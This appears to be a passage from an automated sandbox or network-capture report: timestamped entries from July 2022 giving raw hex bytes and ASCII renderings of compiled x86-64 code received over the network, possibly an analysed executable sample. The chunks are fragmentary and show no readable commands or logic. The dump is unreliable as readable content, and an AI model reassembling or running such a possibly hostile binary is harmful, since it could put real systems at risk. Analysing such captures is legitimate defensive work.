                                                                  2022-07-15 01:58:15 UTC45INData Raw: 89 5c 24 08 48 89 87 30 2a 0b 00 89 5c 24 0c 4c 8d 0c 24 48 8d 05 ae 47 09 00 c7 05 4c 73 0a 00 01 00 00 00 c7 05 46 73 0a 00 02 00 00 00 48 89 05 43 73 0a 00 48 8d 05 6c 0d 06 00 48 89 04 24 49 8b 01 48 89 87 48 2a 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 50 2a 0b 00 48 8d 05 48 47 09 00 89 5c 24 08 48 89 05 2d 73 0a 00 48 8d 05 36 1a 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 09 73 0a 00 02 00 00 00 c7 05 03 73 0a 00 05 00 00 00 48 89 87 68 2a 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 2a 0b 00 89 5c 24 0c 89 1d ff 72 0a 00 c7 05 f9 72 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 ca 46 09 00 48 89 05 eb 72 0a 00 48 8d 05 64 18 06 00 48 89 04 24 49 8b 01 48 89 87 88 2a 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 2a 0b 00 89 5c 24 0c c7 05 d1 72 0a 00 01 00 00 00
                                                                  Data Ascii: \$H0*\$L$HGLsFsHCsHlH$IHH*IAL$HP*HHG\$H-sH6\$H$IssHh*IA\$Hp*\$rrL$HFHrHdH$IH*IA\$H*\$r
                                                                  2022-07-15 01:58:15 UTC47INData Raw: 05 8a d5 07 00 48 89 04 24 49 8b 01 48 89 87 68 2c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 2c 0b 00 89 5c 24 0c 89 1d 2b 70 0a 00 c7 05 25 70 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 6e 40 09 00 48 89 05 17 70 0a 00 48 8d 05 b0 42 07 00 48 89 04 24 49 8b 01 48 89 87 88 2c 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 90 2c 0b 00 48 8d 05 24 40 09 00 89 5c 24 08 48 89 05 01 70 0a 00 48 8d 05 2a d8 07 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 dd 6f 0a 00 01 00 00 00 c7 05 d7 6f 0a 00 02 00 00 00 48 89 87 a8 2c 0b 00 49 8b 41 08 48 89 87 b0 2c 0b 00 48 8d 05 c2 3f 09 00 c7 05 d0 6f 0a 00 01 00 00 00 48 89 05 d1 6f 0a 00 48 8d 05 aa 3e 06 00 c7 05 bc 6f 0a 00 02 00 00 00 48 89 04 24 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 49 8b 01 48 89 87 c8 2c 0b 00 49 8b 41 08 89 5c
                                                                  Data Ascii: H$IHh,IA\$Hp,\$+p%pL$Hn@HpHBH$IH,IAL$H,H$@\$HpH*\$H$IooH,IAH,H?oHoH>oH$\$\$L$IH,IA\
                                                                  2022-07-15 01:58:15 UTC48INData Raw: 00 00 00 4c 8d 0c 24 48 8d 05 b8 39 09 00 48 89 05 11 6d 0a 00 48 8d 05 ca f8 05 00 48 89 04 24 49 8b 01 48 89 87 a8 2e 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 2e 0b 00 89 5c 24 0c c7 05 f7 6c 0a 00 01 00 00 00 c7 05 f1 6c 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 5a 39 09 00 48 89 05 e3 6c 0a 00 48 8d 05 1c f7 05 00 48 89 04 24 49 8b 01 48 89 87 c8 2e 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 2e 0b 00 89 5c 24 0c c7 05 c9 6c 0a 00 01 00 00 00 c7 05 c3 6c 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 fc 38 09 00 48 89 05 b5 6c 0a 00 48 8d 05 ce f8 05 00 48 89 04 24 49 8b 01 48 89 87 e8 2e 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 f0 2e 0b 00 48 8d 05 b2 38 09 00 89 5c 24 08 48 89 05 9f 6c 0a 00 48 8d 05 d8 c9 05 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 7b 6c 0a 00
                                                                  Data Ascii: L$H9HmHH$IH.IA\$H.\$llL$HZ9HlHH$IH.IA\$H.\$llL$H8HlHH$IH.IAL$H.H8\$HlH\$H$I{l
                                                                  2022-07-15 01:58:15 UTC49INData Raw: fd 69 0a 00 01 00 00 00 c7 05 f7 69 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 d8 32 09 00 48 89 05 e9 69 0a 00 48 8d 05 b2 da 05 00 48 89 04 24 49 8b 01 48 89 87 e8 30 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 30 0b 00 89 5c 24 0c c7 05 cf 69 0a 00 01 00 00 00 c7 05 c9 69 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 7a 32 09 00 48 89 05 bb 69 0a 00 48 8d 05 c4 c5 05 00 48 89 04 24 49 8b 01 48 89 87 08 31 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 31 0b 00 89 5c 24 0c c7 05 a1 69 0a 00 03 00 00 00 c7 05 9b 69 0a 00 05 00 00 00 4c 8d 0c 24 48 8d 05 bc ec 08 00 48 89 05 8d 69 0a 00 48 8d 05 56 96 07 00 48 89 04 24 49 8b 01 48 89 87 28 31 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 31 0b 00 89 5c 24 0c 4c 8d 0c 24 c7 05 6f 69 0a 00 01 00 00 00 c7 05 69 69 0a 00 01 00 00
                                                                  Data Ascii: iiL$H2HiHH$IH0IA\$H0\$iiL$Hz2HiHH$IH1IA\$H1\$iiL$HHiHVH$IH(1IA\$H01\$L$oiii
                                                                  2022-07-15 01:58:15 UTC51INData Raw: 48 89 87 08 33 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 33 0b 00 89 5c 24 0c c7 05 c8 66 0a 00 01 00 00 00 c7 05 c2 66 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 a3 2b 09 00 48 89 05 b4 66 0a 00 48 8d 05 5d b0 07 00 48 89 04 24 49 8b 01 48 89 87 28 33 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 33 0b 00 89 5c 24 0c 89 1d 9e 66 0a 00 c7 05 98 66 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 41 2b 09 00 48 89 05 8a 66 0a 00 48 8d 05 c3 ad 07 00 48 89 04 24 49 8b 01 48 89 87 48 33 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 33 0b 00 89 5c 24 0c 89 1d 74 66 0a 00 c7 05 6e 66 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 cf 2a 09 00 48 89 05 60 66 0a 00 48 8d 05 39 ad 05 00 48 89 04 24 49 8b 01 48 89 87 68 33 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 33 0b 00 89 5c 24 0c c7 05 46
                                                                  Data Ascii: H3IA\$H3\$ffL$H+HfH]H$IH(3IA\$H03\$ffL$HA+HfHH$IHH3IA\$HP3\$tfnfL$H*H`fH9H$IHh3IA\$Hp3\$F
                                                                  2022-07-15 01:58:15 UTC52INData Raw: 00 01 00 00 00 c7 05 a8 63 0a 00 04 00 00 00 48 89 87 48 35 0b 00 49 8b 41 08 48 89 87 50 35 0b 00 c7 05 a8 63 0a 00 05 00 00 00 89 5c 24 08 89 5c 24 0c c7 05 9a 63 0a 00 08 00 00 00 4c 8d 0c 24 48 8d 05 ab 24 09 00 48 89 05 8c 63 0a 00 48 8d 05 75 93 08 00 48 89 04 24 49 8b 01 48 89 87 68 35 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 35 0b 00 89 5c 24 0c c7 05 72 63 0a 00 05 00 00 00 c7 05 6c 63 0a 00 08 00 00 00 4c 8d 0c 24 48 8d 05 4d 24 09 00 48 89 05 5e 63 0a 00 48 8d 05 a7 93 08 00 48 89 04 24 49 8b 01 48 89 87 88 35 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 35 0b 00 89 5c 24 0c c7 05 44 63 0a 00 01 00 00 00 c7 05 3e 63 0a 00 04 00 00 00 4c 8d 0c 24 48 8d 05 ef 23 09 00 48 89 05 30 63 0a 00 48 8d 05 99 a0 06 00 48 89 04 24 49 8b 01 48 89 87 a8 35 0b
                                                                  Data Ascii: cHH5IAHP5c\$\$cL$H$HcHuH$IHh5IA\$Hp5\$rclcL$HM$H^cHH$IH5IA\$H5\$Dc>cL$H#H0cHH$IH5
                                                                  2022-07-15 01:58:15 UTC53INData Raw: 00 c7 05 8f 60 0a 00 01 00 00 00 c7 05 89 60 0a 00 01 00 00 00 48 89 05 86 60 0a 00 48 8d 05 cf ad 04 00 48 89 04 24 49 8b 01 48 89 87 88 37 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 90 37 0b 00 48 8d 05 9b 1d 09 00 89 5c 24 08 48 89 05 70 60 0a 00 48 8d 05 49 57 08 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 4c 60 0a 00 01 00 00 00 c7 05 46 60 0a 00 01 00 00 00 48 89 87 a8 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 37 0b 00 89 5c 24 0c c7 05 3e 60 0a 00 01 00 00 00 c7 05 38 60 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 19 1d 09 00 48 89 05 2a 60 0a 00 48 8d 05 93 40 07 00 48 89 04 24 49 8b 01 48 89 87 c8 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 37 0b 00 89 5c 24 0c c7 05 10 60 0a 00 01 00 00 00 c7 05 0a 60 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 b3 1c 09 00
                                                                  Data Ascii: ``H`HH$IH7IAL$H7H\$Hp`HIW\$H$IL`F`H7IA\$H7\$>`8`L$HH*`H@H$IH7IA\$H7\$``L$H
                                                                  2022-07-15 01:58:15 UTC55INData Raw: 89 87 a8 39 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 39 0b 00 89 5c 24 0c c7 05 5e 5d 0a 00 01 00 00 00 c7 05 58 5d 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 69 16 09 00 48 89 05 4a 5d 0a 00 48 8d 05 03 8d 05 00 48 89 04 24 49 8b 01 48 89 87 c8 39 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 d0 39 0b 00 48 8d 05 17 16 09 00 89 5c 24 08 48 89 05 34 5d 0a 00 48 8d 05 cd 8b 05 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 10 5d 0a 00 01 00 00 00 c7 05 0a 5d 0a 00 01 00 00 00 48 89 87 e8 39 0b 00 49 8b 41 08 48 89 87 f0 39 0b 00 48 8d 05 ad 15 09 00 c7 05 03 5d 0a 00 01 00 00 00 48 89 05 04 5d 0a 00 48 8d 05 fd 8b 05 00 c7 05 ef 5c 0a 00 01 00 00 00 48 89 04 24 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 49 8b 01 48 89 87 08 3a 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 3a 0b 00
                                                                  Data Ascii: 9IA\$H9\$^]X]L$HiHJ]HH$IH9IAL$H9H\$H4]H\$H$I]]H9IAH9H]H]H\H$\$\$L$IH:IA\$H:
                                                                  2022-07-15 01:58:15 UTC59INData Raw: 05 3f 9a 07 00 48 89 04 24 49 8b 01 48 89 87 88 40 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 40 0b 00 89 5c 24 0c c7 05 ac 53 0a 00 02 00 00 00 c7 05 a6 53 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 ef ff 08 00 48 89 05 98 53 0a 00 48 8d 05 51 9d 07 00 48 89 04 24 49 8b 01 48 89 87 a8 40 0b 00 49 8b 41 08 4c 89 1c 24 48 89 87 b0 40 0b 00 89 5c 24 08 89 5c 24 0c c7 05 7a 53 0a 00 02 00 00 00 c7 05 74 53 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 85 ff 08 00 48 89 05 66 53 0a 00 49 8b 01 48 89 87 c8 40 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 d0 40 0b 00 4c 89 14 24 89 5c 24 08 89 5c 24 0c 48 8d 05 3a ff 08 00 89 1d 4c 53 0a 00 48 89 05 4d 53 0a 00 49 8b 01 89 1d 40 53 0a 00 48 89 87 e8 40 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 40 0b 00 48 8d 05 ef fe 08 00 89 5c
                                                                  Data Ascii: ?H$IH@IA\$H@\$SSL$HHSHQH$IH@IAL$H@\$\$zStSL$HHfSIH@IAL$H@L$\$\$H:LSHMSI@SH@IA\$H@H\
                                                                  2022-07-15 01:58:15 UTC63INData Raw: 3b c0 72 03 4c 8b c0 e9 93 ff ff ff cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b d9 33 ff b8 02 00 00 00 48 89 79 08 b9 08 00 00 00 48 89 4b 10 48 f7 e1 48 c7 c1 ff ff ff ff 48 0f 40 c1 48 8b c8 e8 51 71 00 00 8d 4f 04 48 89 03 66 89 38 e8 43 71 00 00 48 85 c0 0f 84 12 23 02 00 c7 00 01 00 00 00 48 89 43 18 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 48 8d 05 19 c4 08 00 48 89 01 33 c0 48 89 41 08 48 89 41 10 48 89 41 18 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 57 48 83 ec 20 41 8b f8 83 ef 01 78 34 48 89 5c 24 30 48 89 6c 24 38 48 89 74 24 40 49 8b f1 48 8b ea 48 8b d9 48 8b cb ff d6 48 03 dd 83 ef 01 79 f3 48 8b 74 24 40 48 8b 6c 24 38 48 8b 5c 24 30 48 83 c4 20 5f c3 48 8d 05 01 e9 08 00 48 89 01 33 c0 48 89 41 08 48 89 41 10 48 89 41 18
                                                                  Data Ascii: ;rLH\$WH H3HyHKHHH@HQqOHf8CqH#HCHH\$0H _HH3HAHAHAH@WH Ax4H\$0Hl$8Ht$@IHHHHyHt$@Hl$8H\$0H _HH3HAHAHA
                                                                  2022-07-15 01:58:15 UTC67INData Raw: 3d 7b 58 0b 00 48 89 3d 7c 58 0b 00 48 89 3d 7d 58 0b 00 89 3d 7f 58 0b 00 c7 05 7d 58 0b 00 01 00 00 00 48 89 3d 7e 58 0b 00 e8 21 f1 ff ff 48 8d 0d 9a 58 0b 00 e8 45 0d 00 00 4c 8d 1d 56 08 09 00 48 8d 0d 6f 5a 0b 00 4c 89 1d 38 5a 0b 00 48 89 3d 39 5a 0b 00 48 89 3d 3a 5a 0b 00 48 89 3d 3b 5a 0b 00 e8 e6 09 00 00 48 8d 0d 8f 5c 0b 00 e8 da f0 ff ff 48 89 3d bb 5c 0b 00 48 8d 0d f8 5c 0b 00 33 d2 48 89 3d b3 5c 0b 00 89 3d b5 5c 0b 00 48 89 3d be 5c 0b 00 48 89 3d bf 5c 0b 00 89 3d c1 5c 0b 00 e8 e4 71 ff ff 48 8d 4c 24 20 89 3d d1 5c 0b 00 c7 05 cf 5c 0b 00 01 00 00 00 48 89 3d d0 5c 0b 00 e8 83 4a 00 00 48 8b d0 48 8b 05 a9 54 0b 00 48 63 48 04 48 8d 05 a6 54 0b 00 48 03 c8 e8 66 26 00 00 48 8d 4c 24 48 e8 4c 6d ff ff 48 8d 4c 24 20 e8 42 6d ff ff b9
                                                                  Data Ascii: ={XH=|XH=}X=X}XH=~X!HXELVHoZL8ZH=9ZH=:ZH=;ZH\H=\H\3H=\=\H=\H=\=\qHL$ =\\H=\JHHTHcHHTHf&HL$HLmHL$ Bm
                                                                  2022-07-15 01:58:15 UTC71INData Raw: 89 58 08 48 8b d9 48 89 78 f8 48 8b fa 48 8d 4c 24 28 41 b8 b0 03 00 00 33 d2 c7 44 24 20 b8 03 00 00 e8 74 58 00 00 48 8b cb e8 4c f1 ff ff 80 3d df 37 0a 00 00 74 39 80 3d d8 37 0a 00 00 48 89 7c 24 28 c7 44 24 30 01 00 00 00 c7 44 24 34 02 00 00 00 0f 85 41 16 02 00 80 7b 0d 00 0f 85 50 16 02 00 80 bb e8 02 00 00 01 0f 84 65 16 02 00 ba 01 00 00 00 48 8b cf ff 15 c4 60 08 00 45 33 c9 41 b8 ee 02 00 00 41 8d 51 01 48 8b cf ff 15 c6 60 08 00 48 8b bc 24 e0 03 00 00 48 8b 9c 24 f0 03 00 00 48 81 c4 e8 03 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 4c 89 4c 24 20 57 48 83 ec 30 48 8b 6c 24 60 49 8b f1 41 8b d8 48 8b fa 48 3b 15 7a 37 0a 00 75 7a 81 fb 11 01 00 00 73 37 83 fb 12 72 32 3b 1d 01 6b 0b 00 0f
                                                                  Data Ascii: XHHxHHL$(A3D$ tXHL=7t9=7H|$(D$0D$4A{PeH`E3AAQH`H$H$HH\$Hl$Ht$LL$ WH0Hl$`IAHH;z7uzs7r2;k
                                                                  2022-07-15 01:58:15 UTC75INData Raw: 85 c0 74 09 83 38 01 0f 8f d9 1f 02 00 48 8b 5c 24 30 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 50 48 8b 42 08 45 33 c9 48 8b da 44 89 4c 24 78 48 8b 10 48 8b f9 0f bf 4a 08 85 c9 0f 85 65 79 02 00 48 8b d3 48 8b cf e8 1a 26 ff ff 48 8b 5c 24 60 48 83 c4 50 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b fa 48 8b d9 e8 ab 4c ff ff b9 20 00 00 00 c7 43 08 04 00 00 00 e8 32 41 00 00 48 85 c0 0f 84 f1 fc 01 00 48 8b d7 48 8b c8 e8 76 ef fe ff 48 89 43 10 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 83 b9 80 02 00 00 00 48 8b d9 0f 85 15 00 02 00 80 3d 1b 31 0b 00 00 0f 85 23 00 02 00 48 8d 8b 08 08 00 00 48 8d 15 ba 88 08 00 e8 75 ff
                                                                  Data Ascii: t8H\$0H(H\$WHPHBE3HDL$xHHJeyHH&H\$`HP_H\$WH HHL C2AHHHvHCHH\$0H _H\$WH HH=1#HHu
                                                                  2022-07-15 01:58:15 UTC79INData Raw: e7 fe ff 40 f6 c7 01 74 09 48 8d 4e f8 e8 bf 2c 00 00 48 8b 5c 24 30 48 8d 46 f8 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 8d 0d 25 41 0b 00 e8 d0 fe ff ff 83 3d 91 41 0b 00 00 76 37 48 89 5c 24 30 33 db 48 89 7c 24 20 48 8b fb 48 8b 0d 71 41 0b 00 48 8b 0c 0f e8 68 2c 00 00 ff c3 48 83 c7 08 3b 1d 64 41 0b 00 72 e2 48 8b 7c 24 20 48 8b 5c 24 30 48 8b 0d 49 41 0b 00 e8 44 2c 00 00 48 8d 0d 1d 41 0b 00 e8 18 00 00 00 48 8d 0d f1 40 0b 00 48 83 c4 28 e9 08 00 00 00 cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8d 05 93 83 08 00 48 8b d9 48 89 01 e8 f8 fd ff ff 48 8b 4b 08 48 83 c4 20 5b e9 fa 2b 00 00 cc cc cc cc cc cc cc cc cc cc 48 8d 41 08 ba 10 00 00 00 45 33 c0 0f 1f 40 00 4c 89 00 48 83 c0 10 48 83 ea 01 75 f3 48
                                                                  Data Ascii: @tHN,H\$0HFHt$8H _H(H%A=Av7H\$03H|$ HHqAHh,H;dArH|$ H\$0HIAD,HAH@H(@SH HHHHKH [+HAE3@LHHuH
                                                                  2022-07-15 01:58:15 UTC83INData Raw: 9c 10 fa 27 a1 ea 41 c1 c3 0b 45 03 da 41 8b c3 41 33 c1 41 8b cb 41 33 c2 03 44 24 2c 46 8d 84 00 85 30 ef d4 41 c1 c0 10 45 03 c3 41 33 c8 8b c1 41 33 c2 03 44 24 38 42 8d 94 08 05 1d 88 04 41 8b c0 c1 ca 09 41 03 d0 33 c2 33 ca 03 4c 24 44 46 8d 8c 11 39 d0 d4 d9 41 c1 c1 04 44 03 ca 41 33 c1 03 c5 42 8d 8c 18 e5 99 db e6 c1 c1 0b 41 03 c9 8b c1 33 c2 41 33 c1 03 c7 46 8d 94 00 f8 7c a2 1f 8b c1 41 c1 c2 10 44 03 d1 41 33 c2 41 33 c1 03 44 24 28 44 8d 84 10 65 56 ac c4 8b c1 f7 d0 41 c1 c8 09 45 03 c2 41 0b c0 41 33 c2 03 44 24 20 42 8d 94 08 44 22 29 f4 41 8b c2 f7 d0 c1 c2 06 41 03 d0 0b c2 41 33 c0 41 03 c4 44 8d 8c 08 97 ff 2a 43 41 8b c0 f7 d0 41 c1 c1 0a 44 03 ca 41 0b c1 33 c2 03 c6 42 8d 8c 10 a7 23 94 ab 8b c2 f7 d0 c1 c1 0f 41 03 c9 0b c1 41
                                                                  Data Ascii: 'AEAA3AA3D$,F0AEA3A3D$8BAA33L$DF9ADA3BA3A3F|ADA3A3D$(DeVAEAA3D$ BD")AAA3AD*CAADA3B#AA
                                                                  2022-07-15 01:58:15 UTC87INData Raw: e8 3a 10 00 00 48 85 c0 0f 84 99 d7 01 00 48 89 5c 24 20 48 8b d8 e8 2c 00 00 00 48 8b d0 48 8b cb e8 f1 cf ff ff 48 8b 5c 24 20 48 89 05 dd 29 0b 00 48 8d 05 d6 29 0b 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc 48 83 ec 28 8b 05 9a f5 09 00 a8 01 75 15 83 c8 01 48 8d 0d 38 b3 01 00 89 05 86 f5 09 00 e8 b1 0c 00 00 48 8d 05 7e f5 09 00 48 83 c4 28 c3 cc 40 53 48 83 ec 20 b9 0c 00 00 00 e8 b8 0f 00 00 48 85 c0 0f 84 c7 ce 01 00 48 8b d8 e8 af ff ff ff 48 89 1d 78 29 0b 00 48 8d 05 71 29 0b 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc 48 8b 41 08 33 d2 48 85 c0 0f 85 51 b8 01 00 48 83 c8 ff c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 4c 8b 41 08 45 33 d2 4d 85 c0 0f 85 d6 b7 01 00 48 83 c8 ff 48 8b 5c 24 08 48 8b 74 24 10
                                                                  Data Ascii: :HH\$ H,HHH\$ H)H)H(H(uH8H~H(@SH HHHx)Hq)H [HA3HQHH\$Ht$LAE3MHH\$Ht$
                                                                  2022-07-15 01:58:15 UTC92INData Raw: 8d 15 ec 60 09 00 48 8d 0d 95 d5 09 00 89 05 a7 d5 09 00 e8 36 7c 00 00 48 8d 0d b3 a2 01 00 48 89 1d 7c d5 09 00 e8 6b fc ff ff 48 8d 15 70 d5 09 00 48 8d 4c 24 20 e8 2e 7c 00 00 48 8d 15 c7 21 09 00 48 8d 4c 24 20 48 89 5c 24 20 e8 3c 7d 00 00 cc cc cc cc 40 53 48 83 ec 20 8b d9 e8 e7 7f 00 00 8b cb e8 b8 7d 00 00 48 8b 0d d9 60 09 00 e8 d8 65 00 00 b9 ff 00 00 00 48 83 c4 20 5b 48 ff e0 cc cc cc 40 53 48 83 ec 20 8b d9 48 8d 0d b5 13 08 00 ff 15 3f 03 08 00 48 85 c0 74 19 48 8d 15 93 13 08 00 48 8b c8 ff 15 3a 06 08 00 48 85 c0 74 04 8b cb ff d0 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 20 8b d9 e8 b7 ff ff ff 8b cb ff 15 3b 06 08 00 cc cc cc b9 08 00 00 00 e9 ba 81 00 00 cc cc b9 08 00 00 00 e9 ae 80 00 00 cc cc 48 3b ca 73 2d 48 89 5c 24 08 57 48 83
                                                                  Data Ascii: `H6|HH|kHpHL$ .|H!HL$ H\$ <}@SH }H`eH [H@SH H?HtHH:HtH [@SH ;H;s-H\$WH
                                                                  2022-07-15 01:58:15 UTC96INData Raw: a4 24 a8 00 00 00 4c 8b ac 24 98 00 00 00 48 8b f9 33 c9 4d 8b f9 4c 8b f2 4d 8b c8 8b f1 89 4c 24 70 48 3b f9 74 0a 48 3b d1 75 0f 4c 3b c1 74 0f be 01 00 00 00 e9 c3 01 00 00 4c 3b c1 74 f1 4c 3b f9 75 0c 48 39 8c 24 90 00 00 00 75 e2 eb 0a 48 39 8c 24 90 00 00 00 74 d6 4c 3b e9 75 0c 48 39 8c 24 a0 00 00 00 75 c7 eb 0a 48 39 8c 24 a0 00 00 00 74 bb 4c 3b e1 75 0c 48 39 8c 24 b0 00 00 00 75 ac eb 0a 48 39 8c 24 b0 00 00 00 74 a0 b8 01 00 00 00 48 8b df 66 39 0b 74 0c 48 ff c8 48 83 c3 02 48 3b c1 77 ef 66 83 3b 3a 75 2c 48 3b d1 74 21 49 83 f8 03 0f 82 3f 01 00 00 41 b9 02 00 00 00 4c 8b c7 48 83 ca ff 49 8b ce e8 89 8d 00 00 33 c9 48 8d 7b 02 eb 08 48 3b d1 74 03 66 89 0a 0f b7 07 48 8b e9 48 8b f1 48 8b df 66 3b c1 74 5e 66 83 f8 2f 74 11 66 83 f8 5c
                                                                  Data Ascii: $L$H3MLML$pH;tH;uL;tL;tL;uH9$uH9$tL;uH9$uH9$tL;uH9$uH9$tHf9tHHH;wf;:u,H;t!I?ALHI3H{H;tfHHHf;t^f/tf\
                                                                  2022-07-15 01:58:15 UTC99INData Raw: 00 00 74 3c 8b 4e 08 85 c9 74 35 0f 88 87 00 00 00 48 3b e9 49 8b d6 0f 42 cd 89 4c 24 68 8b d9 44 8b c1 48 8b 0e e8 e5 da ff ff 8b 44 24 68 48 01 1e 29 46 08 48 2b eb 4c 03 f3 e9 92 00 00 00 41 8b dd 48 3b eb 72 64 85 c0 74 0c 48 8b ce e8 ac 02 00 00 85 c0 75 44 45 85 ed 74 0e 33 d2 48 8b c5 48 f7 f3 8b dd 2b da eb 02 8b dd 48 8b ce e8 9b fe ff ff 44 8b c3 49 8b d6 8b c8 e8 fa 9e 00 00 83 f8 ff 74 11 8b c8 3b c3 0f 47 cb 48 2b e9 4c 03 f1 3b c3 73 3a 83 4e 18 20 48 2b fd 33 d2 48 8b c7 49 f7 f4 e9 f5 fe ff ff 41 0f be 0e 48 8b d6 e8 40 72 00 00 83 f8 ff 74 df 49 ff c6 48 ff cd 83 7e 24 00 41 bd 01 00 00 00 44 0f 4f 6e 24 48 85 ed e9 1a ff ff ff 49 8b c7 e9 bf fe ff ff cc cc 48 8b c4 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 48 20 41 54 48 83 ec 30 49 8b
                                                                  Data Ascii: t<Nt5H;IBL$hDHD$hH)FH+LAH;rdtHuDEt3HH+HDIt;GH+L;s:N H+3HIAH@rtIH~$ADOn$HIHHXHpHxLH ATH0I
                                                                  2022-07-15 01:58:15 UTC103INData Raw: 75 1b 8b c5 e9 ce 00 00 00 84 d2 78 f1 e8 4d 4e 00 00 c7 00 16 00 00 00 e9 5a ff ff ff f6 c2 01 0f 84 ad 00 00 00 83 7b 08 00 75 07 33 ed e9 a0 00 00 00 2b 7b 10 4d 8b ec 4d 8b f4 03 7b 08 49 c1 fe 05 41 83 e5 1f 4b 8b 04 f0 4d 6b ed 58 41 f6 44 05 08 80 74 7a 33 d2 41 8b cc 44 8d 42 02 e8 36 b8 00 00 3b c6 75 23 48 8b 43 10 8b cf 48 03 c8 eb 0a 80 38 0a 75 02 ff c7 48 ff c0 48 3b c1 72 f1 0f ba 63 18 0d 73 47 eb 43 45 33 c0 8b d6 41 8b cc e8 02 b8 00 00 85 c0 0f 88 d6 fe ff ff b8 00 02 00 00 3b f8 77 0f f6 43 18 08 74 09 0f ba 63 18 0a 8b f8 73 03 8b 7b 24 48 8d 05 78 eb 0a 00 4a 8b 04 f0 41 f6 44 05 08 04 74 02 ff c7 2b f7 8d 44 35 00 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 8b 7c 24 68 48 83 c4 30 41 5e 41 5d 41 5c c3 cc 48 89 5c 24 10 48 89 4c
                                                                  Data Ascii: uxMNZ{u3+{MM{IAKMkXADtz3ADB6;u#HCH8uHH;rcsGCE3A;wCtcs{$HxJADt+D5H\$PHl$XHt$`H|$hH0A^A]A\H\$HL
                                                                  2022-07-15 01:58:15 UTC107INData Raw: a3 00 00 00 48 85 d2 74 29 f2 0f 10 05 2d de 07 00 f2 0f 59 ee f2 0f 5c 2d 39 de 07 00 f2 0f 58 ec f2 0f 59 2d 65 dd 07 00 f2 0f 5c c5 e9 95 00 00 00 f2 0f 10 15 54 dd 07 00 f2 0f 11 a4 24 80 00 00 00 48 b9 00 00 00 00 ff ff ff ff 48 8b 84 24 80 00 00 00 48 23 c1 48 89 84 24 80 00 00 00 f2 0f 59 f2 f2 0f 59 f5 f2 0f 10 a4 24 80 00 00 00 f2 0f 10 5c 24 78 66 0f 28 c4 66 0f 28 cc f2 0f 58 4c 24 70 f2 0f 59 c4 f2 0f 59 e2 f2 0f 5c d8 f2 0f 5e d9 f2 0f 59 da f2 0f 58 de f2 0f 58 dc 66 0f 28 c3 eb 20 f2 0f 10 05 a7 dd 07 00 f2 0f 59 ea f2 0f 5c c5 f2 0f 5c d0 f2 0f 10 05 83 dd 07 00 f2 0f 5c c2 0f 28 74 24 50 48 83 c4 68 c3 cc 48 83 ec 68 66 0f 57 c9 48 b8 00 00 00 00 00 00 00 80 49 b9 ff ff ff ff ff ff ff 7f f2 0f 11 4c 24 70 f2 0f 11 84 24 80 00 00 00 0f 29
